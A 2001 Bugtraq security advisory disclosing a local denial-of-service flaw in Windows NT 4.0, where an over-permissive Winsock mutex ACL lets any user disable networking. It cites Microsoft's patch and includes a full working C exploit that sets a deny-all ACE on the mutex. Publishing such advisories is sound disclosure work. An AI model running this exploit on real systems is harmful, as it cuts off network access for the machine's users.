[18840] in bugtraq
ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT
daemon@ATHENA.MIT.EDU (Arne Vidstrom)
Mon Jan 29 02:09:29 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <NLECJAEFKPPNCLPPMHLPMEKGCEAA.arne.vidstrom@ntsecurity.nu>
Date: Fri, 26 Jan 2001 19:23:59 +0100
Reply-To: Arne Vidstrom <arne.vidstrom@NTSECURITY.NU>
From: Arne Vidstrom <arne.vidstrom@NTSECURITY.NU>
To: BUGTRAQ@SECURITYFOCUS.COM
-- Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below --
Author:
Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - http://ntsecurity.nu
Severity:
Denial Of Service if the attacker is able to execute the exploit code under
any account on the system. Remote exploitation is not possible.
Details:
There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to
which the Everyone group has Full Control. Any user can change this to No
Access, and that disables all network connectivity through Winsock until the
system is rebooted.
Vendor Response:
Microsoft has released a patch and you can read more about it in their
Security Bulletin at
http://www.microsoft.com/technet/security/bulletin/ms01-003.asp.
Sample exploit code:
/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
/* http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/
#include <windows.h>
#include <aclapi.h>
int main(void)
{
PSID pEveryoneSID;
SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
PACL pDacl;
DWORD sizeNeeded;
AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0,
0, 0, 0, &pEveryoneSID);
sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
GetLengthSid(pEveryoneSID) - sizeof(DWORD);
pDacl = (PACL) malloc(sizeNeeded);
InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
free(pDacl);
return 0;
}
